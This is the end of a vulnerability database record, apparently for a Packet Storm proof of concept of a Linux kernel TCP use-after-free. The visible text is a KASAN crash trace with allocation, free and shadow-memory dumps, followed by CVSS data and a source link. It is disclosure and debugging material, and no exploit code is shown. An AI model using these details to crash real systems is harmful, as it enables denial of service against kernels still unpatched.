21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20 \n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0 \n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210 \n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0 \n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0 \n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50 \n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0 \n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240 \n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0 \n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0 \n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120 \n[ 21.467591] [<ffffffff82bae7f2>] ? 
ip6_dst_check+0x262/0x410 \n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0 \n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550 \n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0 \n[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0 \n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50 \n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0 \n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90 \n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50 \n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0 \n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0 \n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340 \n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750 \n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 \n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20 \n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50 \n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500 \n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 \n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0 \n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0 \n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120 \n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280 \n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350 \n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420 \n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40 \n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0 \n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170 \n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580 \n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0 \n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0 \n[ 21.488258] [<ffffffff8111850e>] ? 
kvm_clock_get_cycles+0x1e/0x20 \n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110 \n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30 \n[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340 \n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d \n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140 \n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0 \n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90 \n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424 \n[ 21.494277] Allocated: \n[ 21.494538] PID = 1711 \n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 \n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 \n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0 \n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20 \n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0 \n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0 \n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790 \n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10 \n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 \n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 \n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 \n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 \n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 \n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 \n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 \n[ 21.504144] Freed: \n[ 21.504368] PID = 1711 \n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 \n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 \n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0 \n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210 \n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0 \n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30 \n[ 21.508339] 
[<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10 \n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 \n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 \n[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 \n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 \n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 \n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 \n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 \n[ 21.513258] Memory state around the buggy address: \n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc \n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.516114] ^ \n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.518203] ================================================================== \n*/ \n \n \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139642/linuxkerneltcp-uaf.txt"}]}